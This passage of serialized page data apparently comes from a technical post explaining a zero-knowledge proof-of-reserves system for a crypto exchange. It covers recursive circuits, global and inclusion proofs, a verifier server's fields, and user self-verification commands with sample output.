6,"children":102668},{"className":102667},[10835,28357],[102669],{"type":30,"value":99736},{"type":24,"tag":301,"props":102671,"children":102673},{"className":102672},[10835,28357],[102674],{"type":30,"value":28499},{"type":24,"tag":301,"props":102676,"children":102678},{"className":102677,"style":99745},[10835],[102679],{"type":30,"value":9918},{"type":24,"tag":301,"props":102681,"children":102683},{"className":102682},[10835,28357],[102684],{"type":30,"value":32},{"type":24,"tag":301,"props":102686,"children":102688},{"className":102687,"style":99745},[10835,28357],[102689],{"type":30,"value":100563},{"type":24,"tag":301,"props":102691,"children":102693},{"className":102692},[10835,28357],[102694],{"type":30,"value":10564},{"type":24,"tag":301,"props":102696,"children":102698},{"className":102697},[10835,28357],[102699],{"type":30,"value":99772},{"type":24,"tag":301,"props":102701,"children":102703},{"className":102702},[28486],[102704],{"type":30,"value":541},{"type":24,"tag":301,"props":102706,"children":102708},{"className":102707},[10835,28357],[102709],{"type":30,"value":188},{"type":24,"tag":301,"props":102711,"children":102713},{"className":102712},[10835,28357],[102714],{"type":30,"value":99736},{"type":24,"tag":301,"props":102716,"children":102718},{"className":102717},[10835,28357],[102719],{"type":30,"value":28499},{"type":24,"tag":301,"props":102721,"children":102723},{"className":102722,"style":99745},[10835],[102724],{"type":30,"value":9918},{"type":24,"tag":301,"props":102726,"children":102728},{"className":102727},[10835,28357],[102729],{"type":30,"value":63123},{"type":24,"tag":301,"props":102731,"children":102733},{"className":102732},[10835,28357],[102734],{"type":30,"value":100003},{"type":24,"tag":301,"props":102736,"children":102738},{"className":102737},[10835,28357],[102739],{"type":30,"value":57861},{"type":24,"tag":301,"props":102741,"children":102743},{"className":102742},[28508],[102744],{"type":30,"value":22200},{"type":24,"tag":301,"props":102746,"children":102748},{"className":102747,"style":11012},[10914],[],{"type":24,"tag":301,"props":102750,"children":102752},{"className":102751},[11017],[102753],{"type":30,"value":607},{"type":24,"tag":301,"props":102755,"children":102757},{"className":102756,"style":11012},[10914],[],{"type":24,"tag":301,"props":102759,"children":102761},{"className":102760},[10824],[102762,102766,102771,102776,102781,102786,102791,102848,102853,102858,102863,102868,102873,102878,102883,102888,102893,102898,102903,102908,102913,102918,102923,102928,102933,102938,102943,102948,102953,102958,102963,102968,102973,102978,102983,102988,102993],{"type":24,"tag":301,"props":102763,"children":102765},{"className":102764,"style":99687},[10829],[],{"type":24,"tag":301,"props":102767,"children":102769},{"className":102768},[10835,28357],[102770],{"type":30,"value":1724},{"type":24,"tag":301,"props":102772,"children":102774},{"className":102773},[10835,28357],[102775],{"type":30,"value":100003},{"type":24,"tag":301,"props":102777,"children":102779},{"className":102778},[10835,28357],[102780],{"type":30,"value":5613},{"type":24,"tag":301,"props":102782,"children":102784},{"className":102783},[10835,28357],[102785],{"type":30,"value":32},{"type":24,"tag":301,"props":102787,"children":102789},{"className":102788},[10835,28357],[102790],{"type":30,"value":102090},{"type":24,"tag":301,"props":102792,"children":102794},{"className":102793},[10835],[102795,102800],{"type":24,"tag":301,"props":102796,"children":102798},{"className":102797,"style":102098},[10835,28357],[102799],{"type":30,"value":39835},{"type":24,"tag":301,"props":102801,"children":102803},{"className":102802},[10850],[102804],{"type":24,"tag":301,"props":102805,"children":102807},{"className":102806},[10855,28411],[102808,102837],{"type":24,"tag":301,"props":102809,"children":102811},{"className":102810},[10860],[102812,102832],{"type":24,"tag":301,"props":102813,"children":102815},{"className":102814,"style":100273},[10865],[102816],{"type":24,"tag":301,"props":102817,"children":102818},{"style":102119},[102819,102823],{"type":24,"tag":301,"props":102820,"children":102822},{"className":102821,"style":10875},[10874],[],{"type":24,"tag":301,"props":102824,"children":102826},{"className":102825},[10880,10881,10882,10883],[102827],{"type":24,"tag":301,"props":102828,"children":102830},{"className":102829},[10835,28357,10883],[102831],{"type":30,"value":10564},{"type":24,"tag":301,"props":102833,"children":102835},{"className":102834},[28514],[102836],{"type":30,"value":28517},{"type":24,"tag":301,"props":102838,"children":102840},{"className":102839},[10860],[102841],{"type":24,"tag":301,"props":102842,"children":102844},{"className":102843,"style":99828},[10865],[102845],{"type":24,"tag":301,"props":102846,"children":102847},{},[],{"type":24,"tag":301,"props":102849,"children":102851},{"className":102850},[10835],[102852],{"type":30,"value":206},{"type":24,"tag":301,"props":102854,"children":102856},{"className":102855},[10835,28357],[102857],{"type":30,"value":32},{"type":24,"tag":301,"props":102859,"children":102861},{"className":102860},[10835,28357],[102862],{"type":30,"value":100003},{"type":24,"tag":301,"props":102864,"children":102866},{"className":102865},[10835,28357],[102867],{"type":30,"value":5613},{"type":24,"tag":301,"props":102869,"children":102871},{"className":102870,"style":99757},[10835,28357],[102872],{"type":30,"value":99760},{"type":24,"tag":301,"props":102874,"children":102876},{"className":102875},[10835,28357],[102877],{"type":30,"value":10564},{"type":24,"tag":301,"props":102879,"children":102881},{"className":102880},[10835,28357],[102882],{"type":30,"value":294},{"type":24,"tag":301,"props":102884,"children":102886},{"className":102885,"style":99745},[10835],[102887],{"type":30,"value":9918},{"type":24,"tag":301,"props":102889,"children":102891},{"className":102890},[10835,28357],[102892],{"type":30,"value":102195},{"type":24,"tag":301,"props":102894,"children":102896},{"className":102895},[10835,28357],[102897],{"type":30,"value":32},{"type":24,"tag":301,"props":102899,"children":102901},{"className":102900},[10835,28357],[102902],{"type":30,"value":100003},{"type":24,"tag":301,"props":102904,"children":102906},{"className":102905},[10835,28357],[102907],{"type":30,"value":28499},{"type":24,"tag":301,"props":102909,"children":102911},{"className":102910},[10835],[102912],{"type":30,"value":206},{"type":24,"tag":301,"props":102914,"children":102916},{"className":102915},[10835,28357],[102917],{"type":30,"value":188},{"type":24,"tag":301,"props":102919,"children":102921},{"className":102920},[10835,28357],[102922],{"type":30,"value":99736},{"type":24,"tag":301,"props":102924,"children":102926},{"className":102925},[10835,28357],[102927],{"type":30,"value":28499},{"type":24,"tag":301,"props":102929,"children":102931},{"className":102930,"style":99745},[10835],[102932],{"type":30,"value":9918},{"type":24,"tag":301,"props":102934,"children":102936},{"className":102935},[10835,28357],[102937],{"type":30,"value":32},{"type":24,"tag":301,"props":102939,"children":102941},{"className":102940,"style":99745},[10835,28357],[102942],{"type":30,"value":100563},{"type":24,"tag":301,"props":102944,"children":102946},{"className":102945},[10835,28357],[102947],{"type":30,"value":10564},{"type":24,"tag":301,"props":102949,"children":102951},{"className":102950},[10835,28357],[102952],{"type":30,"value":100574},{"type":24,"tag":301,"props":102954,"children":102956},{"className":102955},[28486],[102957],{"type":30,"value":541},{"type":24,"tag":301,"props":102959,"children":102961},{"className":102960},[10835,28357],[102962],{"type":30,"value":188},{"type":24,"tag":301,"props":102964,"children":102966},{"className":102965},[10835,28357],[102967],{"type":30,"value":99736},{"type":24,"tag":301,"props":102969,"children":102971},{"className":102970},[10835,28357],[102972],{"type":30,"value":28499},{"type":24,"tag":301,"props":102974,"children":102976},{"className":102975,"style":99745},[10835],[102977],{"type":30,"value":9918},{"type":24,"tag":301,"props":102979,"children":102981},{"className":102980},[10835,28357],[102982],{"type":30,"value":63123},{"type":24,"tag":301,"props":102984,"children":102986},{"className":102985},[10835,28357],[102987],{"type":30,"value":100003},{"type":24,"tag":301,"props":102989,"children":102991},{"className":102990},[10835,28357],[102992],{"type":30,"value":57861},{"type":24,"tag":301,"props":102994,"children":102996},{"className":102995},[28508],[102997],{"type":30,"value":22200},{"type":30,"value":13277},{"type":24,"tag":60,"props":103000,"children":103001},{},[103002],{"type":30,"value":103003},"(verifies if all asset prices are the same)",{"type":24,"tag":2659,"props":103005,"children":103006},{},[103007,103386,103387],{"type":24,"tag":145,"props":103008,"children":103010},{"className":103009},[10807,10808],[103011],{"type":24,"tag":301,"props":103012,"children":103014},{"className":103013},[10813],[103015],{"type":24,"tag":301,"props":103016,"children":103018},{"className":103017,"ariaHidden":10819},[10818],[103019,103100],{"type":24,"tag":301,"props":103020,"children":103022},{"className":103021},[10824],[103023,103027,103032,103037,103042,103047,103052,103057,103062,103067,103072,103077,103082,103087,103091,103096],{"type":24,"tag":301,"props":103024,"children":103026},{"className":103025,"style":101157},[10829],[],{"type":24,"tag":301,"props":103028,"children":103030},{"className":103029},[10835,28357],[103031],{"type":30,"value":57861},{"type":24,"tag":301,"props":103033,"children":103035},{"className":103034,"style":99745},[10835,28357],[103036],{"type":30,"value":101169},{"type":24,"tag":301,"props":103038,"children":103040},{"className":103039,"style":101173},[10835,28357],[103041],{"type":30,"value":95387},{"type":24,"tag":301,"props":103043,"children":103045},{"className":103044,"style":99757},[10835,28357],[103046],{"type":30,"value":99760},{"type":24,"tag":301,"props":103048,"children":103050},{"className":103049},[10835,28357],[103051],{"type":30,"value":58179},{"type":24,"tag":301,"props":103053,"children":103055},{"className":103054,"style":99745},[10835],[103056],{"type":30,"value":9918},{"type":24,"tag":301,"props":103058,"children":103060},{"className":103059},[10835,28357],[103061],{"type":30,"value":28499},{"type":24,"tag":301,"props":103063,"children":103065},{"className":103064},[10835,28357],[103066],{"type":30,"value":101201},{"type":24,"tag":301,"props":103068,"children":103070},{"className":103069,"style":99745},[10835],[103071],{"type":30,"value":9918},{"type":24,"tag":301,"props":103073,"children":103075},{"className":103074},[10835,28357],[103076],{"type":30,"value":101212},{"type":24,"tag":301,"props":103078,"children":103080},{"className":103079},[10835,28357],[103081],{"type":30,"value":1724},{"type":24,"tag":301,"props":103083,"children":103085},{"className":103084},[10835,28357],[103086],{"type":30,"value":2597},{"type":24,"tag":301,"props":103088,"children":103090},{"className":103089,"style":11012},[10914],[],{"type":24,"tag":301,"props":103092,"children":103094},{"className":103093},[11017],[103095],{"type":30,"value":607},{"type":24,"tag":301,"props":103097,"children":103099},{"className":103098,"style":11012},[10914],[],{"type":24,"tag":301,"props":103101,"children":103103},{"className":103102},[10824],[103104,103108,103113,103118,103123,103128,103133,103138,103143,103148,103153,103210,103215,103219,103224,103229,103286,103291,103295,103300,103305,103309,103314,103319,103381],{"type":24,"tag":301,"props":103105,"children":103107},{"className":103106,"style":10935},[10829],[],{"type":24,"tag":301,"props":103109,"children":103111},{"className":103110,"style":28358},[10835,28357],[103112],{"type":30,"value":28361},{"type":24,"tag":301,"props":103114,"children":103116},{"className":103115},[10835,28357],[103117],{"type":30,"value":99699},{"type":24,"tag":301,"props":103119,"children":103121},{"className":103120},[10835,28357],[103122],{"type":30,"value":10564},{"type":24,"tag":301,"props":103124,"children":103126},{"className":103125},[10835,28357],[103127],{"type":30,"value":77277},{"type":24,"tag":301,"props":103129,"children":103131},{"className":103130},[10835,28357],[103132],{"type":30,"value":99715},{"type":24,"tag":301,"props":103134,"children":103136},{"className":103135},[10835,28357],[103137],{"type":30,"value":63123},{"type":24,"tag":301,"props":103139,"children":103141},{"className":103140},[28486],[103142],{"type":30,"value":362},{"type":24,"tag":301,"props":103144,"children":103146},{"className":103145},[10835,28357],[103147],{"type":30,"value":101212},{"type":24,"tag":301,"props":103149,"children":103151},{"className":103150},[10835,28357],[103152],{"type":30,"value":1724},{"type":24,"tag":301,"props":103154,"children":103156},{"className":103155},[10835],[103157,103162],{"type":24,"tag":301,"props":103158,"children":103160},{"className":103159},[10835,28357],[103161],{"type":30,"value":2597},{"type":24,"tag":301,"props":103163,"children":103165},{"className":103164},[10850],[103166],{"type":24,"tag":301,"props":103167,"children":103169},{"className":103168},[10855,28411],[103170,103199],{"type":24,"tag":301,"props":103171,"children":103173},{"className":103172},[10860],[103174,103194],{"type":24,"tag":301,"props":103175,"children":103177},{"className":103176,"style":99797},[10865],[103178],{"type":24,"tag":301,"props":103179,"children":103180},{"style":99801},[103181,103185],{"type":24,"tag":301,"props":103182,"children":103184},{"className":103183,"style":10875},[10874],[],{"type":24,"tag":301,"props":103186,"children":103188},{"className":103187},[10880,10881,10882,10883],[103189],{"type":24,"tag":301,"props":103190,"children":103192},{"className":103191},[10835,10883],[103193],{"type":30,"value":584},{"type":24,"tag":301,"props":103195,"children":103197},{"className":103196},[28514],[103198],{"type":30,"value":28517},{"type":24,"tag":301,"props":103200,"children":103202},{"className":103201},[10860],[103203],{"type":24,"tag":301,"props":103204,"children":103206},{"className":103205,"style":99828},[10865],[103207],{"type":24,"tag":301,"props":103208,"children":103209},{},[],{"type":24,"tag":301,"props":103211,"children":103213},{"className":103212},[10946],[103214],{"type":30,"value":10949},{"type":24,"tag":301,"props":103216,"children":103218},{"className":103217,"style":10953},[10914],[],{"type":24,"tag":301,"props":103220,"children":103222},{"className":103221},[10835,28357],[103223],{"type":30,"value":101212},{"type":24,"tag":301,"props":103225,"children":103227},{"className":103226},[10835,28357],[103228],{"type":30,"value":1724},{"type":24,"tag":301,"props":103230,"children":103232},{"className":103231},[10835],[103233,103238],{"type":24,"tag":301,"props":103234,"children":103236},{"className":103235},[10835,28357],[103237],{"type":30,"value":2597},{"type":24,"tag":301,"props":103239,"children":103241},{"className":103240},[10850],[103242],{"type":24,"tag":301,"props":103243,"children":103245},{"className":103244},[10855,28411],[103246,103275],{"type":24,"tag":301,"props":103247,"children":103249},{"className":103248},[10860],[103250,103270],{"type":24,"tag":301,"props":103251,"children":103253},{"className":103252,"style":99797},[10865],[103254],{"type":24,"tag":301,"props":103255,"children":103256},{"style":99801},[103257,103261],{"type":24,"tag":301,"props":103258,"children":103260},{"className":103259,"style":10875},[10874],[],{"type":24,"tag":301,"props":103262,"children":103264},{"className":103263},[10880,10881,10882,10883],[103265],{"type":24,"tag":301,"props":103266,"children":103268},{"className":103267},[10835,10883],[103269],{"type":30,"value":546},{"type":24,"tag":301,"props":103271,"children":103273},{"className":103272},[28514],[103274],{"type":30,"value":28517},{"type":24,"tag":301,"props":103276,"children":103278},{"className":103277},[10860],[103279],{"type":24,"tag":301,"props":103280,"children":103282},{"className":103281,"style":99828},[10865],[103283],{"type":24,"tag":301,"props":103284,"children":103285},{},[],{"type":24,"tag":301,"props":103287,"children":103289},{"className":103288},[10946],[103290],{"type":30,"value":10949},{"type":24,"tag":301,"props":103292,"children":103294},{"className":103293,"style":10953},[10914],[],{"type":24,"tag":301,"props":103296,"children":103298},{"className":103297},[10835],[103299],{"type":30,"value":4054},{"type":24,"tag":301,"props":103301,"children":103303},{"className":103302},[10946],[103304],{"type":30,"value":10949},{"type":24,"tag":301,"props":103306,"children":103308},{"className":103307,"style":10953},[10914],[],{"type":24,"tag":301,"props":103310,"children":103312},{"className":103311},[10835,28357],[103313],{"type":30,"value":101212},{"type":24,"tag":301,"props":103315,"children":103317},{"className":103316},[10835,28357],[103318],{"type":30,"value":1724},{"type":24,"tag":301,"props":103320,"children":103322},{"className":103321},[10835],[103323,103328],{"type":24,"tag":301,"props":103324,"children":103326},{"className":103325},[10835,28357],[103327],{"type":30,"value":2597},{"type":24,"tag":301,"props":103329,"children":103331},{"className":103330},[10850],[103332],{"type":24,"tag":301,"props":103333,"children":103335},{"className":103334},[10855,28411],[103336,103370],{"type":24,"tag":301,"props":103337,"children":103339},{"className":103338},[10860],[103340,103365],{"type":24,"tag":301,"props":103341,"children":103343},{"className":103342,"style":99797},[10865],[103344],{"type":24,"tag":301,"props":103345,"children":103346},{"style":99801},[103347,103351],{"type":24,"tag":301,"props":103348,"children":103350},{"className":103349,"style":10875},[10874],[],{"type":24,"tag":301,"props":103352,"children":103354},{"className":103353},[10880,10881,10882,10883],[103355],{"type":24,"tag":301,"props":103356,"children":103358},{"className":103357},[10835,10883],[103359],{"type":24,"tag":301,"props":103360,"children":103362},{"className":103361},[10835,10883],[103363],{"type":30,"value":103364},"31",{"type":24,"tag":301,"props":103366,"children":103368},{"className":103367},[28514],[103369],{"type":30,"value":28517},{"type":24,"tag":301,"props":103371,"children":103373},{"className":103372},[10860],[103374],{"type":24,"tag":301,"props":103375,"children":103377},{"className":103376,"style":99828},[10865],[103378],{"type":24,"tag":301,"props":103379,"children":103380},{},[],{"type":24,"tag":301,"props":103382,"children":103384},{"className":103383},[28508],[103385],{"type":30,"value":9961},{"type":30,"value":13277},{"type":24,"tag":60,"props":103388,"children":103389},{},[103390],{"type":30,"value":101532},{"type":24,"tag":2659,"props":103392,"children":103393},{},[103394,103399,103400],{"type":24,"tag":5422,"props":103395,"children":103396},{},[103397],{"type":30,"value":103398},"checks if each sum is overflowing by checking if the sum of two positive numbers results in a negative one",{"type":30,"value":13277},{"type":24,"tag":60,"props":103401,"children":103402},{},[103403],{"type":30,"value":101816},{"type":24,"tag":32,"props":103405,"children":103406},{},[103407],{"type":30,"value":103408},"Here is a visual scheme of the inputs of the recursive circuit. Note that this tree only has three levels (L1, L2, L3). Depending on the number of users, it may have more recursive levels:",{"type":24,"tag":32,"props":103410,"children":103411},{},[103412],{"type":24,"tag":177,"props":103413,"children":103415},{"alt":179,"src":103414},"/posts/por/recursive-circuit.png",[],{"type":24,"tag":43,"props":103417,"children":103419},{"id":103418},"global-proof-and-inclusion-proofs",[103420],{"type":30,"value":103421},"Global Proof and Inclusion Proofs",{"type":24,"tag":80,"props":103423,"children":103424},{"id":16088},[103425],{"type":30,"value":103426},"Proving",{"type":24,"tag":32,"props":103428,"children":103429},{},[103430,103432,103438,103439,103445,103446,103452],{"type":30,"value":103431},"After proving all batch circuits and all recursive circuits, we have the final proof (which is the ZK proof of the recursive tree root), the entire Merkle tree, and the user nonces. In our code, it is serialized to ",{"type":24,"tag":145,"props":103433,"children":103435},{"className":103434},[],[103436],{"type":30,"value":103437},"merkle_tree.json",{"type":30,"value":377},{"type":24,"tag":145,"props":103440,"children":103442},{"className":103441},[],[103443],{"type":30,"value":103444},"final_proof.json",{"type":30,"value":8410},{"type":24,"tag":145,"props":103447,"children":103449},{"className":103448},[],[103450],{"type":30,"value":103451},"private_nonces.json",{"type":30,"value":103453}," files.",{"type":24,"tag":32,"props":103455,"children":103456},{},[103457],{"type":30,"value":103458},"Using the ZK proof and the Merkle tree, we can already prove the sum of the asset balances and their non-negativity; we refer to this as the \"global proof.\"",{"type":24,"tag":32,"props":103460,"children":103461},{},[103462,103464,103470,103472,103477],{"type":30,"value":103463},"For the user inclusion proofs, we get the Merkle tree, the user asset balances, the identification hash, and the nonce to bundle it in one proof file (",{"type":24,"tag":145,"props":103465,"children":103467},{"className":103466},[],[103468],{"type":30,"value":103469},"inclusion_proof_\u003Cid>.json",{"type":30,"value":103471},"). ",{"type":24,"tag":5422,"props":103473,"children":103474},{},[103475],{"type":30,"value":103476},"We bundle only a part of the Merkle tree to the inclusion proof file to make the proof smaller",{"type":30,"value":206},{"type":24,"tag":80,"props":103479,"children":103481},{"id":103480},"verifying",[103482],{"type":30,"value":103483},"Verifying",{"type":24,"tag":32,"props":103485,"children":103486},{},[103487],{"type":24,"tag":60,"props":103488,"children":103489},{},[103490],{"type":30,"value":103491},"Global Proof",{"type":24,"tag":32,"props":103493,"children":103494},{},[103495,103497,103502,103503,103508],{"type":30,"value":103496},"To verify the global proof, the code deserializes the ",{"type":24,"tag":145,"props":103498,"children":103500},{"className":103499},[],[103501],{"type":30,"value":103437},{"type":30,"value":44289},{"type":24,"tag":145,"props":103504,"children":103506},{"className":103505},[],[103507],{"type":30,"value":103444},{"type":30,"value":103509}," files and performs these checks:",{"type":24,"tag":6246,"props":103511,"children":103512},{},[103513,103518,103523,103528,103554],{"type":24,"tag":2659,"props":103514,"children":103515},{},[103516],{"type":30,"value":103517},"Validate if the final proof was generated with a valid and trusted circuit.",{"type":24,"tag":2659,"props":103519,"children":103520},{},[103521],{"type":30,"value":103522},"Verify the ZK final proof.",{"type":24,"tag":2659,"props":103524,"children":103525},{},[103526],{"type":30,"value":103527},"Verify if asset prices are valid. (It doesn't verify if it matches the real price; you need to do it manually. It only verifies if decimals are valid.)",{"type":24,"tag":2659,"props":103529,"children":103530},{},[103531,103533,103539,103541,103546,103547,103552],{"type":30,"value":103532},"Verify if the Merkle tree root hash is the same as the final proof ",{"type":24,"tag":145,"props":103534,"children":103536},{"className":103535},[],[103537],{"type":30,"value":103538},"merkle_tree_hash",{"type":30,"value":103540}," public input. This ensures that the ",{"type":24,"tag":145,"props":103542,"children":103544},{"className":103543},[],[103545],{"type":30,"value":103437},{"type":30,"value":2378},{"type":24,"tag":145,"props":103548,"children":103550},{"className":103549},[],[103551],{"type":30,"value":103444},{"type":30,"value":103553}," are linked (they belong to the same global proof).",{"type":24,"tag":2659,"props":103555,"children":103556},{},[103557],{"type":30,"value":103558},"Verify the entire Merkle tree by hashing all the nodes again, starting with the batch circuit, since the verifier won't have the necessary information to hash the leaves again (for privacy). This ensures that the tree was not tampered with.",{"type":24,"tag":32,"props":103560,"children":103561},{},[103562],{"type":24,"tag":60,"props":103563,"children":103564},{},[103565],{"type":30,"value":103566},"Inclusion Proof",{"type":24,"tag":32,"props":103568,"children":103569},{},[103570,103572,103577,103579,103584],{"type":30,"value":103571},"To verify the inclusion proof, the code deserializes the ",{"type":24,"tag":145,"props":103573,"children":103575},{"className":103574},[],[103576],{"type":30,"value":103469},{"type":30,"value":103578}," file and also the ",{"type":24,"tag":145,"props":103580,"children":103582},{"className":103581},[],[103583],{"type":30,"value":103444},{"type":30,"value":103585},". After that, it performs these checks:",{"type":24,"tag":6246,"props":103587,"children":103588},{},[103589,103593,103598,103603],{"type":24,"tag":2659,"props":103590,"children":103591},{},[103592],{"type":30,"value":103522},{"type":24,"tag":2659,"props":103594,"children":103595},{},[103596],{"type":30,"value":103597},"Verify if the Merkle tree root is the same as in the final proof.",{"type":24,"tag":2659,"props":103599,"children":103600},{},[103601],{"type":30,"value":103602},"Recalculate the user-related node leaf hash.",{"type":24,"tag":2659,"props":103604,"children":103605},{},[103606],{"type":30,"value":103607},"Verify a partial Merkle tree using the recalculated hash (it doesn't contain all the leaves).",{"type":24,"tag":43,"props":103609,"children":103611},{"id":103610},"por-verifier-server",[103612],{"type":30,"value":103613},"PoR Verifier Server",{"type":24,"tag":32,"props":103615,"children":103616},{},[103617,103619,103625],{"type":30,"value":103618},"To automate the verification process, we created a ",{"type":24,"tag":188,"props":103620,"children":103622},{"href":99256,"rel":103621},[192],[103623],{"type":30,"value":103624},"verifier server",{"type":30,"value":103626}," that the exchange can submit the proofs into. Once submitted, the proof is validated and added to the database.",{"type":24,"tag":32,"props":103628,"children":103629},{},[103630],{"type":30,"value":103631},"Once the proof was added, any user can enter the website and see its information (see backpack's example):",{"type":24,"tag":32,"props":103633,"children":103634},{},[103635],{"type":24,"tag":177,"props":103636,"children":103638},{"alt":179,"src":103637},"/posts/por/backpack-por.png",[],{"type":24,"tag":32,"props":103640,"children":103641},{},[103642],{"type":30,"value":103643},"Here is a breakdown of what fields represent and why they are required:",{"type":24,"tag":2655,"props":103645,"children":103646},{},[103647,103657,103667,103677,103687,103697],{"type":24,"tag":2659,"props":103648,"children":103649},{},[103650,103655],{"type":24,"tag":60,"props":103651,"children":103652},{},[103653],{"type":30,"value":103654},"Status",{"type":30,"value":103656}," --> verifies if the proof is valid, ensuring that the information has not been tampered with.",{"type":24,"tag":2659,"props":103658,"children":103659},{},[103660,103665],{"type":24,"tag":60,"props":103661,"children":103662},{},[103663],{"type":30,"value":103664},"Proof Timestamp",{"type":30,"value":103666}," --> when the proof was generated by the exchange.",{"type":24,"tag":2659,"props":103668,"children":103669},{},[103670,103675],{"type":24,"tag":60,"props":103671,"children":103672},{},[103673],{"type":30,"value":103674},"Verify Timestamp",{"type":30,"value":103676}," --> when the proof was verified by the PoR server.",{"type":24,"tag":2659,"props":103678,"children":103679},{},[103680,103685],{"type":24,"tag":60,"props":103681,"children":103682},{},[103683],{"type":30,"value":103684},"Proof File URL",{"type":30,"value":103686}," --> the URL where the proof was downloaded from. Users can download it to verify the proof's validity themselves.",{"type":24,"tag":2659,"props":103688,"children":103689},{},[103690,103695],{"type":24,"tag":60,"props":103691,"children":103692},{},[103693],{"type":30,"value":103694},"Prover Version",{"type":30,"value":103696}," --> the version of PoRv2 used. Using different versions for proving/verifying can result in errors due to ZK circuit discrepancies. Therefore, if you are going to verify the validity of the proof yourself, ensure that you download and use the same prover version as the proof.",{"type":24,"tag":2659,"props":103698,"children":103699},{},[103700,103705],{"type":24,"tag":60,"props":103701,"children":103702},{},[103703],{"type":30,"value":103704},"File Hash (SHA256)",{"type":30,"value":103706}," --> since we only store the URL of the proof, it can be maliciously changed after our verification. SHA256 can be used to prove if the file was modified after the verification. If you are going to verify the proof by yourself, check if the downloaded zip file matches the hash shown on the website.",{"type":24,"tag":32,"props":103708,"children":103709},{},[103710],{"type":30,"value":103711},"Also, you can check the exchange's liabilities on the website:",{"type":24,"tag":32,"props":103713,"children":103714},{},[103715],{"type":24,"tag":177,"props":103716,"children":103718},{"alt":179,"src":103717},"/posts/por/backpack-por-liabilities.png",[],{"type":24,"tag":32,"props":103720,"children":103721},{},[103722,103724,103730,103732,103738],{"type":30,"value":103723},"These are the amount of assets that the exchange should have in their reserves to be solvent on each asset. You can match if they have it by checking their reserve wallets on blockchain. You can see backpack's wallets in ",{"type":24,"tag":188,"props":103725,"children":103728},{"href":103726,"rel":103727},"https://backpack.exchange/reserves",[192],[103729],{"type":30,"value":103726},{"type":30,"value":103731}," and our verifier server for backpack at ",{"type":24,"tag":188,"props":103733,"children":103736},{"href":103734,"rel":103735},"https://backpack-por.osec.io/",[192],[103737],{"type":30,"value":103734},{"type":30,"value":206},{"type":24,"tag":43,"props":103740,"children":103742},{"id":103741},"self-verification",[103743],{"type":30,"value":103744},"Self-verification",{"type":24,"tag":32,"props":103746,"children":103747},{},[103748],{"type":30,"value":103749},"You, as a user, can verify both proofs by yourself, the inclusion proof to verify if you were included in the PoR total liabilities sum and the global proof to verify if the commitments provided by the exchange are valid.",{"type":24,"tag":80,"props":103751,"children":103753},{"id":103752},"how-to-verify-if-i-was-included",[103754],{"type":30,"value":103755},"How to verify if I was included?",{"type":24,"tag":32,"props":103757,"children":103758},{},[103759],{"type":30,"value":103760},"If you are a user and want to do the self-verification of inclusion, you will need to follow these steps:",{"type":24,"tag":6246,"props":103762,"children":103763},{},[103764,103775,103793],{"type":24,"tag":2659,"props":103765,"children":103766},{},[103767,103774],{"type":24,"tag":188,"props":103768,"children":103771},{"href":103769,"rel":103770},"https://github.com/otter-sec/por_v2/releases",[192],[103772],{"type":30,"value":103773},"Download the PoRv2 executable from our github",{"type":30,"value":206},{"type":24,"tag":2659,"props":103776,"children":103777},{},[103778,103780,103785,103786,103791],{"type":30,"value":103779},"Download the inclusion and the final proof files from the exchange (",{"type":24,"tag":145,"props":103781,"children":103783},{"className":103782},[],[103784],{"type":30,"value":103469},{"type":30,"value":2378},{"type":24,"tag":145,"props":103787,"children":103789},{"className":103788},[],[103790],{"type":30,"value":103444},{"type":30,"value":103792},") and put the files in the same directory as the PoRv2 app.",{"type":24,"tag":2659,"props":103794,"children":103795},{},[103796,103798,103804],{"type":30,"value":103797},"Open the terminal and execute this: ",{"type":24,"tag":145,"props":103799,"children":103801},{"className":103800},[],[103802],{"type":30,"value":103803},"./plonky2_por verify-inclusion",{"type":30,"value":206},{"type":24,"tag":32,"props":103806,"children":103807},{},[103808],{"type":30,"value":103809},"This will verify if the proofs are valid and show your asset balances. You will need to verify manually that the balances are correct. Remember that the proofs are not calculated in real-time; you must verify if the balances were correct at the proof generation date. Here is an example of a valid proof being verified:",{"type":24,"tag":291,"props":103811,"children":103813},{"code":103812},"[!] The following information was used to generate the proof, please manually verify if they are correct:\n[!] NOTE: This is not real-time information, verify if the information is correct relative to the time of the proof generation\n[!] NOTE2: Some asset balances was rounded by some decimals, verify if they are close enough to the original balance\n======================\nProof generation date: 2025-02-22 19:59:59 UTC\nProof generation timestamp (ms): 1740254399944\nNumber of accounted assets: 100\n\n-----Asset balances-----\nETH: 0\nBTC: 1.2\nUSDC: 0\n...\n======================\n[!] Verifying global proof (trusting circuit data inside the file)...\n[+] Global proof is valid!\n[!] Verifying inclusion proof...\n[+] Inclusion proof root hash is valid! The user is included in the merkle tree!\n[+] Successfully verified inclusion proof for file: inclusion_proof_00476816e43cf2efffdabdda7f55c5203bc9e28382c551f83931de02fd364a25.json\n\n[+] All inclusion proofs are valid!\n[+] Finished in 13.731875ms!\n",[103814],{"type":24,"tag":145,"props":103815,"children":103816},{"__ignoreMap":7},[103817],{"type":30,"value":103812},{"type":24,"tag":80,"props":103819,"children":103821},{"id":103820},"how-can-i-verify-the-global-proof",[103822],{"type":30,"value":103823},"How can I verify the global proof?",{"type":24,"tag":32,"props":103825,"children":103826},{},[103827],{"type":30,"value":103828},"If you want to verify if the global proof is valid, you just need to follow these steps:",{"type":24,"tag":6246,"props":103830,"children":103831},{},[103832,103841,103859],{"type":24,"tag":2659,"props":103833,"children":103834},{},[103835,103840],{"type":24,"tag":188,"props":103836,"children":103838},{"href":103769,"rel":103837},[192],[103839],{"type":30,"value":103773},{"type":30,"value":206},{"type":24,"tag":2659,"props":103842,"children":103843},{},[103844,103846,103851,103852,103857],{"type":30,"value":103845},"Download the ",{"type":24,"tag":145,"props":103847,"children":103849},{"className":103848},[],[103850],{"type":30,"value":103437},{"type":30,"value":44289},{"type":24,"tag":145,"props":103853,"children":103855},{"className":103854},[],[103856],{"type":30,"value":103444},{"type":30,"value":103858}," files and put them in the same directory as the PoRv2 app. You can download those files from our PoR verifier server (download the zip file and unzip it).",{"type":24,"tag":2659,"props":103860,"children":103861},{},[103862,103864,103869],{"type":30,"value":103863},"Open the terminal and execute ",{"type":24,"tag":145,"props":103865,"children":103867},{"className":103866},[],[103868],{"type":30,"value":103803},{"type":30,"value":103870},". This might take a while to verify since it needs to deserialize a big file and verify the final proof circuit (which involves rebuilding it).",{"type":24,"tag":32,"props":103872,"children":103873},{},[103874],{"type":30,"value":103875},"This will verify the global proof and print the asset prices to be manually verified. Note that the asset prices shown are not real-time; you must match them to the price on the proof generation date and time.",{"type":24,"tag":291,"props":103877,"children":103879},{"code":103878},"[!] Verifying the proof of reserves...\n[!] The following 